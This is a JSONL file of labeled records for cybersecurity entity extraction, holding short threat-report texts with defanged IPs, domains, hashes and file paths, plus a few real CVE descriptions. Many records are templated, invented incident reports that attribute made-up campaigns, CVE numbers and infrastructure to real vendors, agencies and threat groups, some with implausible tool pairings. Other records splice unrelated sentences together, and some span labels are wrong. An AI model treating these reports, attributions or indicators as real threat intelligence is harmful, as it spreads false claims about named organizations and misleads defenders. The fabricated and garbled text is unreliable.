{"text": "By integrating the findings with prior research , it was possible to connect MONSOON directly with infrastructure used by the HANGOVER group via a series of strong connections . In late September 2015 Mofang used the website of Myanmara 's national airline hosted at www[.]flymna[.]com for an attack against an organization in Myanmar .", "spans": {"Indicator: www.flymna.com": [[267, 285]]}, "info": {"id": "cyberner_stix_train_004429", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Dridex campaign:\nStage 1 dropper at C:\\Windows\\Tasks\\shell.php - SHA1: ba4a697129fe0a157e80462ed3bd2916fd333014\nStage 2 loader at /tmp/implant.so - SHA1: 67f93cd86492d0b5f5dc4287b06703f010e7fb66\nFinal payload at /home/user/.config/helper.sh - MD5: 6b36d9ab6a185c99cb7fbacd3f75f406\nExfiltration module - SHA256: a8a886bf32d7f7476559d79d9cb660c10c9d08977fa2d59ee92d7fd4394568d2\nAll stages communicated with 172 [ . ] 81 [ . ] 36 [ . ] 92. Burp Suite signatures detected in Stage 2.", "spans": {"Malware: Dridex": [[22, 28]], "Indicator: ba4a697129fe0a157e80462ed3bd2916fd333014": [[93, 133]], "Indicator: 67f93cd86492d0b5f5dc4287b06703f010e7fb66": [[176, 216]], "Indicator: 6b36d9ab6a185c99cb7fbacd3f75f406": [[270, 302]], "Indicator: a8a886bf32d7f7476559d79d9cb660c10c9d08977fa2d59ee92d7fd4394568d2": [[333, 397]], "Indicator: 172.81.36.92": [[427, 457]]}, "info": {"id": "synth_v2_01870", "source": "defanged_augment"}}
{"text": "Microsoft MSRC detected a multi-stage attack chain. The initial phishing email from info@mail-service[.]info contained a link to hxxps://relaygateway[.]dev/admin/config. This redirected to hxxp://cdnstorage[.]cc/portal/verify on update-gateway[ . ]tech. A secondary email from helpdesk@mail-service[ . ]info pointed to hxxp://cdndata[.]xyz/portal/verify which delivered AgentTesla. The final payload callback was hxxp://backup-storage[.]link/assets/js/payload.js resolving to 192 [ . ] 106 [ . ] 244 [ . ] 19 via datalogin[.]site.", "spans": {"Organization: Microsoft MSRC": [[0, 14]], "Indicator: info@mail-service.info": [[84, 108]], "Indicator: hxxps://relaygateway.dev/admin/config": [[129, 168]], "Indicator: http://cdnstorage.cc/portal/verify": [[189, 225]], "Indicator: update-gateway.tech": [[229, 252]], "Indicator: helpdesk@mail-service.info": [[277, 307]], "Indicator: http://cdndata.xyz/portal/verify": [[319, 353]], "Malware: AgentTesla": [[370, 380]], "Indicator: hxxp://backup-storage.link/assets/js/payload.js": [[413, 462]], "Indicator: 192.106.244.19": [[476, 508]], "Indicator: datalogin.site": [[513, 529]]}, "info": {"id": "synth_v2_01789", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Recorded Future identified a large-scale phishing operation. Emails originated from noreply@account-update[.]xyz and updates@secure-verify[ . ]net, spoofing legitimate services. Victims were directed to hxxp://loginportal[ . ]site/admin/config which hosted a credential harvesting page on proxy-update[.]top. A secondary link hxxps://portalmail[.]com/callback delivered Cobalt Strike (MD5: 3273f400313a6299159989ed01de5273). The malware was saved to /usr/local/bin/taskhost.exe and established C2 with 10[.]193[.]215[.]221.", "spans": {"Organization: Recorded Future": [[26, 41]], "Indicator: noreply@account-update.xyz": [[110, 138]], "Indicator: updates@secure-verify.net": [[143, 172]], "Indicator: hxxp://loginportal.site/admin/config": [[229, 269]], "Indicator: proxy-update.top": [[315, 333]], "Indicator: https://portalmail.com/callback": [[352, 385]], "Malware: Cobalt Strike": [[396, 409]], "Indicator: 3273f400313a6299159989ed01de5273": [[416, 448]], "Indicator: 10.193.215.221": [[528, 548]]}, "info": {"id": "synth_v2_01057", "source": "defanged_augment"}}
{"text": "The MuddyWater threat group, attributed to Iran's Ministry of Intelligence and Security, deployed a new backdoor called PhonyC2 against Israeli organizations. The malware was delivered via phishing emails containing malicious Excel macros. PhonyC2 communicates with the domain connect[ . ]civilstream[ . ]com using HTTPS POST requests. The backdoor supports file upload, download, and arbitrary command execution on compromised Windows hosts.", "spans": {"Malware: PhonyC2": [[120, 127], [240, 247]], "Indicator: connect.civilstream.com": [[277, 308]], "System: Windows": [[428, 435]]}, "info": {"id": "mandiant_00039", "source": "defanged_augment"}}
{"text": "The loader first dynamically rebuilds a simple import address table ( IAT ) , resolving all the API needed from Kernel32 and NtDll libraries . The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method , specifically attempting to load MagicHound.Rollover . Winnti : bb4ab0d8d05a3404f1f53f152ebd79f4ba4d4d81 2018-10-10 09:57:31 hxxp://checkin[ . ]travelsanignacio[ . ]com . Developed in - house using C++ , the NoEscape ransomware uses a hybrid approach to encryption , combining ChaCha20 and RSA encryption algorithms for file encryption and key protection .", "spans": {"Indicator: bb4ab0d8d05a3404f1f53f152ebd79f4ba4d4d81": [[312, 352]], "Indicator: http://checkin.travelsanignacio.com": [[373, 416]], "Malware: NoEscape ransomware": [[456, 475]]}, "info": {"id": "cyberner_stix_train_002601", "source": "defanged_augment"}}
{"text": "Check that the mutex WininetStartupMutex0 does not already exist Check that no DLL whose base name has hash value of 0xC9CEF3E4 is mapped into the malware address space The hashes in these checks are most likely correspond to sandbox or security products that the FinFisher authors want to avoid . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . This white paper describes the steganography algorithm used in two distinct loader variants and looks at the launcher of the backdoor that was encoded in one of the .png cover images . mcvsocfg[ . ]dll : In April , Talos discovered a new ransomware actor , RA Group , conducting double extortion attacks using their ransomware variant based on leaked Babuk source code .", "spans": {"Malware: FinFisher": [[264, 273]], "Malware: Microsoft ActiveMime file": [[372, 397]], "Indicator: mcvsocfg.dll": [[625, 641]], "Organization: Talos": [[655, 660]], "Malware: Babuk source code": [[791, 808]]}, "info": {"id": "cyberner_stix_train_005691", "source": "defanged_augment"}}
{"text": "The initial sample we intercepted was a Microsoft Word document ( SHA256 : 2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f ) with the filename crash list ( Lion Air Boeing 737 )[ . ]docx using the author name Joohn .", "spans": {"Organization: Microsoft": [[40, 49]], "Indicator: 2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f": [[75, 139]], "Indicator: crash list ( Lion Air Boeing 737 ).docx": [[160, 203]]}, "info": {"id": "cyberner_stix_train_002479", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Conti (SHA256: ecf918534bbe284a5ca72aec778d12972d7e503d1366b6a35fdb0322e8707549). Upon execution on Zyxel USG, the sample creates /opt/app/bin/implant.so and injects into legitimate processes. Network analysis shows beaconing to 10[.]38[.]90[.]96 every 60 seconds and DNS queries to login-cache[.]link. The second stage was fetched from hxxps://api-api[ . ]com/assets/js/payload.js and written to C:\\ProgramData\\payload.bin. The payload uses BITSAdmin-style techniques for defense evasion. A secondary hash (SHA256: ca5ef186bf7de79650af30eaa62b1214e435e406447a2461820d543ee2461302) was extracted from the unpacked payload.", "spans": {"Malware: Conti": [[25, 30]], "Indicator: ecf918534bbe284a5ca72aec778d12972d7e503d1366b6a35fdb0322e8707549": [[40, 104]], "System: Zyxel USG": [[125, 134]], "Indicator: 10.38.90.96": [[254, 271]], "Indicator: login-cache.link": [[308, 326]], "Indicator: hxxps://api-api.com/assets/js/payload.js": [[362, 406]], "Indicator: ca5ef186bf7de79650af30eaa62b1214e435e406447a2461820d543ee2461302": [[541, 605]]}, "info": {"id": "synth_v2_00546", "source": "defanged_augment"}}
{"text": "Check Point Research published a threat intelligence report linking FIN7 to a new campaign exploiting CVE-2022-27335 in Palo Alto PAN-OS. The attackers deployed PlugX via LinPEAS, establishing C2 communication with 14[.]135[.]59[.]14 and edgedata[ . ]site. A secondary payload was downloaded from hxxp://proxysync[ . ]org/login. The malware binary (MD5: 7d27e5624bcd4fc2a207a778570181ee) was dropped to C:\\Windows\\Tasks\\lsass.dmp. Phishing emails were sent from ceo@urgent-notice[.]online targeting enterprise users. A backup C2 server was identified at 172 [ . ] 204 [ . ] 243 [ . ] 78.", "spans": {"Organization: Check Point Research": [[0, 20]], "Vulnerability: CVE-2022-27335": [[102, 116]], "System: Palo Alto PAN-OS": [[120, 136]], "Malware: PlugX": [[161, 166]], "Indicator: 14.135.59.14": [[215, 233]], "Indicator: edgedata.site": [[238, 255]], "Indicator: http://proxysync.org/login": [[297, 327]], "Indicator: 7d27e5624bcd4fc2a207a778570181ee": [[354, 386]], "Indicator: ceo@urgent-notice.online": [[462, 488]], "Indicator: 172.204.243.78": [[554, 586]]}, "info": {"id": "synth_v2_00216", "source": "defanged_augment"}}
{"text": "Content of bdata.xml file : It can be added to the /system/etc/sysconfig/ path to allowlist specified implant components from the battery saving system . The malware known as RATANKBA is just one of the weapons in Lazarus ' arsenal . APT33 : 162 [ . ] 250 [ . ] 145 [ . ] 234 mynetwork[ . ]ddns[ . ]net . When it comes to Cuba and similar threats , access to highfidelity threat intelligence to help identify the highest risk , most actively exploitable vulnerabilities can help prioritization efforts when organizations are faced with a backlog of vulnerabilities to address .", "spans": {"Indicator: 162.250.145.234": [[242, 275]], "Indicator: mynetwork.ddns.net": [[276, 302]]}, "info": {"id": "cyberner_stix_train_006347", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.UsernameReimuatH.Trojan Worm/W32[.]WBNA[.]294912[.]AU Trojan.Win32.Diple!O Trojan.Beebone.D Trojan/VBObfus.fz Win32.Worm.Pronny.d Win32/VB.KXfdHDB WORM_VOBFUS.SM37 Win.Packer.VBCrypt-5731517-0 Worm.Win32.Vobfus.erof Trojan.Win32.Vobfus.enwdjc Win32.Worm.Vobfus.Wvay Win32.HLLW.Autoruner2.18084 WORM_VOBFUS.SM37 BehavesLike.Win32.Autorun.dh Win32.Virut.ce.57344 Trojan.Symmi.D13A73 Trojan.Win32.A.Diple.299008.BAT Worm.Win32.Vobfus.erof Worm/Win32.WBNA.R108353 TScope.Trojan.VB Worm.Win32.Vobfus", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: W32.WBNA.294912.AU": [[59, 83]]}, "info": {"id": "cyner2_train_001462", "source": "defanged_augment"}}
{"text": "Blog Post by SentinelOne: Tracking Salt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2024-35928 against Windows Server 2019 deployments. The initial access vector involves spear-phishing emails from admin@credential-check[ . ]site delivering TrickBot. Post-compromise, the attackers deploy PlugX and use Mimikatz for reconnaissance. C2 infrastructure includes 34 [ . ] 197 [ . ] 111 [ . ] 48 and portalsecure[.]dev. A staging server at hxxps://cloudlogin[ . ]site/gate.php hosts additional tooling. Key artifact: C:\\Users\\admin\\AppData\\Local\\Temp\\backdoor.elf (SHA256: 21c6009812e29c0115d91c20b55be492cab84bd4484dd4a121ea75b03b1f8563).", "spans": {"Organization: SentinelOne": [[13, 24]], "Vulnerability: CVE-2024-35928": [[127, 141]], "System: Windows Server 2019": [[150, 169]], "Indicator: admin@credential-check.site": [[245, 276]], "Malware: TrickBot": [[288, 296]], "Malware: PlugX": [[336, 341]], "Indicator: 34.197.111.48": [[406, 437]], "Indicator: portalsecure.dev": [[442, 460]], "Indicator: https://cloudlogin.site/gate.php": [[482, 518]], "Indicator: 21c6009812e29c0115d91c20b55be492cab84bd4484dd4a121ea75b03b1f8563": [[615, 679]]}, "info": {"id": "synth_v2_01680", "source": "defanged_augment"}}
{"text": "FBI published a threat intelligence report linking Flax Typhoon to a new campaign exploiting CVE-2021-16698 in Apache Struts. The attackers deployed FormBook via PowerView, establishing C2 communication with 172 [ . ] 78 [ . ] 216 [ . ] 203 and edgenode[ . ]dev. A secondary payload was downloaded from hxxps://edgecdn[ . ]link/assets/js/payload.js. The malware binary (SHA1: 269d116dc2f561c564d776bf88795a92865561a6) was dropped to C:\\ProgramData\\taskhost.exe. Phishing emails were sent from helpdesk@auth-check[ . ]org targeting enterprise users. A backup C2 server was identified at 19[.]229[.]245[.]150.", "spans": {"Organization: FBI": [[0, 3]], "Vulnerability: CVE-2021-16698": [[93, 107]], "System: Apache Struts": [[111, 124]], "Malware: FormBook": [[149, 157]], "Indicator: 172.78.216.203": [[208, 240]], "Indicator: edgenode.dev": [[245, 261]], "Indicator: https://edgecdn.link/assets/js/payload.js": [[303, 348]], "Indicator: 269d116dc2f561c564d776bf88795a92865561a6": [[376, 416]], "Indicator: helpdesk@auth-check.org": [[493, 520]], "Indicator: 19.229.245.150": [[586, 606]]}, "info": {"id": "synth_v2_00090", "source": "defanged_augment"}}
{"text": "X-Force IRIS discovered that the threat actor was hosting at least one malicious executable on a server hosted on ntg-sa[.]com .", "spans": {"Organization: X-Force IRIS": [[0, 12]], "Indicator: ntg-sa.com": [[114, 126]]}, "info": {"id": "cyberner_stix_train_007628", "source": "defanged_augment"}}
{"text": "The LockBit attack began with exploitation of CVE-2023-20198. The ransomware binary (SHA256: c393ca0eb7bc6f728f14083b5758604c5b8faf4892456ae05961359e44cf655e) was deployed to C:\\Windows\\System32\\drivers\\ndis_helper.sys. Ransom negotiation portal was hosted at monitor-net[[ . ]]org (151[.]172[.]125[.]55). Contact email for payment: alert@security-warning[.]dev.", "spans": {"Malware: LockBit": [[4, 11]], "Vulnerability: CVE-2023-20198": [[46, 60]], "Indicator: c393ca0eb7bc6f728f14083b5758604c5b8faf4892456ae05961359e44cf655e": [[93, 157]], "Indicator: monitor-net[.]org": [[260, 281]], "Indicator: 151.172.125.55": [[283, 303]], "Indicator: alert@security-warning.dev": [[333, 361]]}, "info": {"id": "synth_00028", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2026-10752 is a critical buffer overflow affecting MOVEit Transfer. CrowdStrike confirmed active exploitation by Sandworm in the wild. Exploitation delivers BlackCat (SHA256: 5f0ad18e93b1440da3a0705e96a645fa180928b3fa457be1585cf97d97751d69) which is dropped to /usr/local/bin/beacon.dll. The exploit payload is hosted at hxxp://gatewaysync[.]com/download/update.exe and communicates to 10 [ . ] 204 [ . ] 112 [ . ] 237 for C2.", "spans": {"Vulnerability: CVE-2026-10752": [[24, 38]], "Vulnerability: buffer overflow": [[53, 68]], "System: MOVEit Transfer": [[79, 94]], "Organization: CrowdStrike": [[96, 107]], "Malware: BlackCat": [[185, 193]], "Indicator: 5f0ad18e93b1440da3a0705e96a645fa180928b3fa457be1585cf97d97751d69": [[203, 267]], "Indicator: http://gatewaysync.com/download/update.exe": [[349, 393]], "Indicator: 10.204.112.237": [[414, 446]]}, "info": {"id": "synth_v2_00781", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 91[.]163[.]253[.]109, the Dragos IR team identified Dridex running as /var/tmp/lsass.dmp. The threat actor, believed to be Scattered Spider, used CrackMapExec for credential harvesting and Rubeus for lateral movement. Exfiltrated data was sent to portal-gateway[.]io and edgeedge[.]online. The initial dropper (SHA1: 943c555498a203507d3f868cae0be4c2e7913e02) was delivered via a phishing email from account@document-share[.]link. A second C2 node was observed at 178 [ . ] 211 [ . ] 170 [ . ] 36, with a persistence mechanism writing to C:\\ProgramData\\shell.php.", "spans": {"Indicator: 91.163.253.109": [[64, 84]], "Organization: Dragos": [[90, 96]], "Malware: Dridex": [[116, 122]], "Indicator: portal-gateway.io": [[311, 330]], "Indicator: edgeedge.online": [[335, 352]], "Indicator: 943c555498a203507d3f868cae0be4c2e7913e02": [[381, 421]], "Indicator: account@document-share.link": [[463, 492]], "Indicator: 178.211.170.36": [[527, 559]]}, "info": {"id": "synth_v2_00363", "source": "defanged_augment"}}
{"text": "The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT . This includes Python scripts . Usually , the Stageless Meterpreter has the Ext_server_stdapi[.]x64[.]dll” , Ext_server_extapi[.]x64[.]dll” , and Ext_server_espia[ . ]x64[ . ]dll” extensions .", "spans": {"Organization: social media": [[30, 42]], "Indicator: Stageless Meterpreter": [[257, 278]], "Indicator: Ext_server_stdapi.x64.dll”": [[287, 317]], "Indicator: Ext_server_extapi.x64.dll”": [[320, 350]], "Indicator: Ext_server_espia.x64.dll”": [[357, 390]]}, "info": {"id": "cyberner_stix_train_005640", "source": "defanged_augment"}}
{"text": "Vulnerability in the Oracle Applications DBA component of Oracle Database Server. Supported versions that are affected are 12 [ . ] 1 [ . ] 0 [ . ] 2, 12[.]2[.]0[.]1, 18c and 19c. Easily exploitable vulnerability allows low privileged attacker having Local Logon privilege with logon to the infrastructure where Oracle Applications DBA executes to compromise Oracle Applications DBA. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications DBA accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Applications DBA. CVSS 3.0 Base Score 3.9 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L).", "spans": {"Indicator: 12.1.0.2": [[123, 149]], "Indicator: 12.2.0.1": [[151, 165]], "System: Oracle Database": [[58, 73]], "Organization: Oracle": [[21, 27], [312, 318], [359, 365], [579, 585], [698, 704]], "Vulnerability: denial of service": [[663, 680]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-2568"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 29 [ . ] 61 [ . ] 189 [ . ] 147, the Google TAG IR team identified RedLine Stealer running as C:\\Program Files\\Common Files\\update.dll. The threat actor, believed to be Diamond Sleet, used Metasploit for credential harvesting and ADFind for lateral movement. Exfiltrated data was sent to mailbackup[ . ]info and updatelogin[ . ]org. The initial dropper (SHA256: 750cff1ae73a22643b24fd5bb0d0b5bd02264854f51c63f9623c8d6c8869740e) was delivered via a phishing email from verify@phishing-domain[.]com. A second C2 node was observed at 11[.]78[.]60[.]96, with a persistence mechanism writing to /home/user/.config/agent.py.", "spans": {"Indicator: 29.61.189.147": [[64, 95]], "Organization: Google TAG": [[101, 111]], "Malware: RedLine Stealer": [[131, 146]], "Indicator: mailbackup.info": [[352, 371]], "Indicator: updatelogin.org": [[376, 395]], "Indicator: 750cff1ae73a22643b24fd5bb0d0b5bd02264854f51c63f9623c8d6c8869740e": [[426, 490]], "Indicator: verify@phishing-domain.com": [[532, 560]], "Indicator: 11.78.60.96": [[595, 612]]}, "info": {"id": "synth_v2_00285", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 37 [ . ] 100 [ . ] 221 [ . ] 150, the Dragos IR team identified Latrodectus running as /home/user/.config/implant.so. The threat actor, believed to be Mustang Panda, used Impacket for credential harvesting and WinPEAS for lateral movement. Exfiltrated data was sent to dataportal[.]site and authsync[.]dev. The initial dropper (SHA1: 67be9dd5c4ef78fb6114649b843cad70ed0844d3) was delivered via a phishing email from ceo@document-share[.]link. A second C2 node was observed at 172[.]112[.]16[.]122, with a persistence mechanism writing to /home/user/.config/config.dat.", "spans": {"Indicator: 37.100.221.150": [[64, 96]], "Organization: Dragos": [[102, 108]], "Malware: Latrodectus": [[128, 139]], "Indicator: dataportal.site": [[333, 350]], "Indicator: authsync.dev": [[355, 369]], "Indicator: 67be9dd5c4ef78fb6114649b843cad70ed0844d3": [[398, 438]], "Indicator: ceo@document-share.link": [[480, 505]], "Indicator: 172.112.16.122": [[540, 560]]}, "info": {"id": "synth_v2_00401", "source": "defanged_augment"}}
{"text": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10[.]3[.]6[.]0.0, 12[.]1[.]3[.]0.0, 12[.]2[.]1[.]3.0 and 12[.]2[.]1[.]4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data as well as unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).", "spans": {"Indicator: 10.3.6.0": [[143, 157]], "Indicator: 12.1.3.0": [[161, 175]], "Indicator: 12.2.1.3": [[179, 193]], "Indicator: 12.2.1.4": [[200, 214]], "Organization: Oracle": [[21, 27], [55, 61], [326, 332], [467, 473], [656, 662], [746, 752]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-14572"}}
{"text": "Phishing Campaign Report: FBI identified a large-scale phishing operation. Emails originated from billing@login-portal[.]tech and report@urgent-notice[.]online, spoofing legitimate services. Victims were directed to hxxp://api-backup[ . ]online/wp-content/uploads/doc.php which hosted a credential harvesting page on storageapi[.]club. A secondary link hxxps://relay-login[ . ]club/collect delivered Vidar (MD5: 8bed84c16529363b442c0a57cc2c62a9). The malware was saved to C:\\Windows\\Tasks\\svchost.exe and established C2 with 51[.]208[.]112[.]172.", "spans": {"Organization: FBI": [[26, 29]], "Indicator: billing@login-portal.tech": [[98, 125]], "Indicator: report@urgent-notice.online": [[130, 159]], "Indicator: hxxp://api-backup.online/wp-content/uploads/doc.php": [[216, 271]], "Indicator: storageapi.club": [[317, 334]], "Indicator: hxxps://relay-login.club/collect": [[353, 389]], "Malware: Vidar": [[400, 405]], "Indicator: 8bed84c16529363b442c0a57cc2c62a9": [[412, 444]], "Indicator: 51.208.112.172": [[525, 545]]}, "info": {"id": "synth_v2_01079", "source": "defanged_augment"}}
{"text": "Poison Ivy is a remote access tool that is freely available for download from its official web site at www[ . ]poisonivy-rat[ . ]com .", "spans": {"Indicator: www.poisonivy-rat.com": [[103, 132]]}, "info": {"id": "dnrti_train_000899", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Tenable identified a large-scale phishing operation. Emails originated from verify@phishing-domain[.]com and verify@credential-check[.]site, spoofing legitimate services. Victims were directed to hxxp://mailsync[ . ]info/assets/js/payload.js which hosted a credential harvesting page on apibackup[ . ]site. A secondary link hxxp://edge-login[ . ]dev/api/v2/auth delivered IcedID (SHA1: 7f621723a29e0d15c417f54bb2bd88462fc1bcd5). The malware was saved to /opt/app/bin/helper.sh and established C2 with 108[.]248[.]198[.]105.", "spans": {"Organization: Tenable": [[26, 33]], "Indicator: verify@phishing-domain.com": [[102, 130]], "Indicator: verify@credential-check.site": [[135, 165]], "Indicator: http://mailsync.info/assets/js/payload.js": [[222, 267]], "Indicator: apibackup.site": [[313, 331]], "Indicator: hxxp://edge-login.dev/api/v2/auth": [[350, 387]], "Malware: IcedID": [[398, 404]], "Indicator: 7f621723a29e0d15c417f54bb2bd88462fc1bcd5": [[412, 452]], "Indicator: 108.248.198.105": [[527, 548]]}, "info": {"id": "synth_v2_00991", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.SampleswareTG.Trojan Trojan-GameThief.Win32.Magania!O Backdoor.Farfli.O Trojan/Magania.eken Win32.Trojan.Farfli.ai Win32/Farfli.GKH Win.Trojan.Magania-19224 Trojan-GameThief.Win32.Magania.uagj Trojan.Win32.Magania.bvkxn Troj.W32.MMM.ljA2 Backdoor.Win32.Gh0st.g Trojan.Magania.Win32.38676 BKDR_INJECT.SMJ BehavesLike[.]Win32[.]Backdoor[.]cc Backdoor/IRCBot.qan Trojan.Barys.62 Trojan-GameThief.Win32.Magania.uagj Trojan/Win32.PcClient.R12944 TrojanPSW.Magania Win32/Farfli.AK Trojan.Farfli!czCLTsqt/Nw Backdoor.Win32.FirstInj Backdoor.Win32.Gh0st.BH", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Backdoor.cc": [[334, 369]]}, "info": {"id": "cyner2_train_000797", "source": "defanged_augment"}}
{"text": "Blog Post by Check Point Research: Tracking UNC2452's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2024-26162 against Windows Server 2019 deployments. The initial access vector involves spear-phishing emails from account@phishing-domain[ . ]com delivering IcedID. Post-compromise, the attackers deploy XLoader and use Certutil for reconnaissance. C2 infrastructure includes 172[.]204[.]32[.]225 and proxy-cache[.]com. A staging server at hxxps://securemail[ . ]org/callback hosts additional tooling. Key artifact: C:\\Program Files\\Common Files\\dropper.ps1 (MD5: 7dd06682833ede7f4f1b4e2fe2552a80).", "spans": {"Organization: Check Point Research": [[13, 33]], "Vulnerability: CVE-2024-26162": [[131, 145]], "System: Windows Server 2019": [[154, 173]], "Indicator: account@phishing-domain.com": [[249, 280]], "Malware: IcedID": [[292, 298]], "Malware: XLoader": [[338, 345]], "Indicator: 172.204.32.225": [[410, 430]], "Indicator: proxy-cache.com": [[435, 452]], "Indicator: https://securemail.org/callback": [[474, 509]], "Indicator: 7dd06682833ede7f4f1b4e2fe2552a80": [[598, 630]]}, "info": {"id": "synth_v2_01659", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Proofpoint identified a large-scale phishing operation. Emails originated from helpdesk@phishing-domain[.]com and noreply@auth-check[ . ]org, spoofing legitimate services. Victims were directed to hxxps://update-static[ . ]info/download/update.exe which hosted a credential harvesting page on dataauth[.]cc. A secondary link hxxp://relay-mail[.]cc/assets/js/payload.js delivered DarkSide (SHA256: 8aab0c3d27847582657c5321b5e0d3716223b4df94098b5057f868683f5b88c5). The malware was saved to C:\\Users\\admin\\AppData\\Local\\Temp\\implant.so and established C2 with 12 [ . ] 68 [ . ] 237 [ . ] 90.", "spans": {"Organization: Proofpoint": [[26, 36]], "Indicator: helpdesk@phishing-domain.com": [[105, 135]], "Indicator: noreply@auth-check.org": [[140, 166]], "Indicator: https://update-static.info/download/update.exe": [[223, 273]], "Indicator: dataauth.cc": [[319, 332]], "Indicator: http://relay-mail.cc/assets/js/payload.js": [[351, 394]], "Malware: DarkSide": [[405, 413]], "Indicator: 8aab0c3d27847582657c5321b5e0d3716223b4df94098b5057f868683f5b88c5": [[423, 487]], "Indicator: 12.68.237.90": [[584, 614]]}, "info": {"id": "synth_v2_00994", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlib/alloc_tag: do not acquire non-existent lock in alloc_tag_top_users()\n\nalloc_tag_top_users() attempts to lock alloc_tag_cttype->mod_lock even\nwhen the alloc_tag_cttype is not allocated because:\n\n  1) alloc tagging is disabled because mem profiling is disabled\n     (!alloc_tag_cttype)\n  2) alloc tagging is enabled, but not yet initialized (!alloc_tag_cttype)\n  3) alloc tagging is enabled, but failed initialization\n     (!alloc_tag_cttype or IS_ERR(alloc_tag_cttype))\n\nIn all cases, alloc_tag_cttype is not allocated, and therefore\nalloc_tag_top_users() should not attempt to acquire the semaphore.\n\nThis leads to a crash on memory allocation failure by attempting to\nacquire a non-existent semaphore:\n\n  Oops: general protection fault, probably for non-canonical address 0xdffffc000000001b: 0000 [#3] SMP KASAN NOPTI\n  KASAN: null-ptr-deref in range [0x00000000000000d8-0x00000000000000df]\n  CPU: 2 UID: 0 PID: 1 Comm: systemd Tainted: G      D             6.16.0-rc2 #1 VOLUNTARY\n  Tainted: [D]=DIE\n  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014\n  RIP: 0010:down_read_trylock+0xaa/0x3b0\n  Code: d0 7c 08 84 d2 0f 85 a0 02 00 00 8b 0d df 31 dd 04 85 c9 75 29 48 b8 00 00 00 00 00 fc ff df 48 8d 6b 68 48 89 ea 48 c1 ea 03 <80> 3c 02 00 0f 85 88 02 00 00 48 3b 5b 68 0f 85 53 01 00 00 65 ff\n  RSP: 0000:ffff8881002ce9b8 EFLAGS: 00010016\n  RAX: dffffc0000000000 RBX: 0000000000000070 RCX: 0000000000000000\n  RDX: 000000000000001b RSI: 000000000000000a RDI: 0000000000000070\n  RBP: 00000000000000d8 R08: 0000000000000001 R09: ffffed107dde49d1\n  R10: ffff8883eef24e8b R11: ffff8881002cec20 R12: 1ffff11020059d37\n  R13: 00000000003fff7b R14: ffff8881002cec20 R15: dffffc0000000000\n  FS:  00007f963f21d940(0000) GS:ffff888458ca6000(0000) knlGS:0000000000000000\n  CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n  CR2: 00007f963f5edf71 CR3: 000000010672c000 CR4: 0000000000350ef0\n  Call Trace:\n   <TASK>\n   codetag_trylock_module_list+0xd/0x20\n   alloc_tag_top_users+0x369/0x4b0\n   __show_mem+0x1cd/0x6e0\n   warn_alloc+0x2b1/0x390\n   __alloc_frozen_pages_noprof+0x12b9/0x21a0\n   alloc_pages_mpol+0x135/0x3e0\n   alloc_slab_page+0x82/0xe0\n   new_slab+0x212/0x240\n   ___slab_alloc+0x82a/0xe00\n   </TASK>\n\nAs David Wang points out, this issue became easier to trigger after commit\n780138b12381 (\"alloc_tag: check mem_profiling_support in alloc_tag_init\").\n\nBefore the commit, the issue occurred only when it failed to allocate and\ninitialize alloc_tag_cttype or if a memory allocation fails before\nalloc_tag_init() is called.  After the commit, it can be easily triggered\nwhen memory profiling is compiled but disabled at boot.\n\nTo properly determine whether alloc_tag_init() has been called and its\ndata structures initialized, verify that alloc_tag_cttype is a valid\npointer before acquiring the semaphore.  If the variable is NULL or an\nerror value, it has not been properly initialized.  In such a case, just\nskip and do not attempt to acquire the semaphore.\n\n[harry.yoo@oracle[ . ]com: v3]", "spans": {"Indicator: oracle.com": [[3090, 3104]], "System: Linux kernel": [[7, 19]], "System: systemd": [[994, 1001]], "System: QEMU": [[1092, 1096]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-38517"}}
